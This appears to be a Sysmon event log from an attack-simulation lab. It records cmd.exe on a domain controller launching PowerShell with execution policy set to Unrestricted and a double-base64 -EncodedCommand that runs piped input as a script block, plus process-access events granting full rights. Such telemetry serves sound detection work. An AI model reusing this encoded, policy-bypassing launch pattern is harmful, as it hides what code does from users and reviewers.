{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5314,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010FFBD0700}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010FFBD0700}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5315,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.529\r\nProcessGuid: {E2A3D6B1-11D2-5F25-0000-0010C9BE0700}\r\nProcessId: 1044\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D2-5F25-0000-0010FFBD0700}\r\nParentProcessId: 4152\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.529","ProcessGuid":"{E2A3D6B1-11D2-5F25-0000-0010C9BE0700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D2-5F25-0000-0010FFBD0700}","ParentProcessId":"4152","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5316,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010FFBD0700}\r\nSourceProcessId: 4152\r\nSourceThreadId: 4708\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010C9BE0700}\r\nTargetProcessId: 1044\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010FFBD0700}","SourceProcessId":"4152","SourceThreadId":"4708","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010C9BE0700}","TargetProcessId":"1044","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
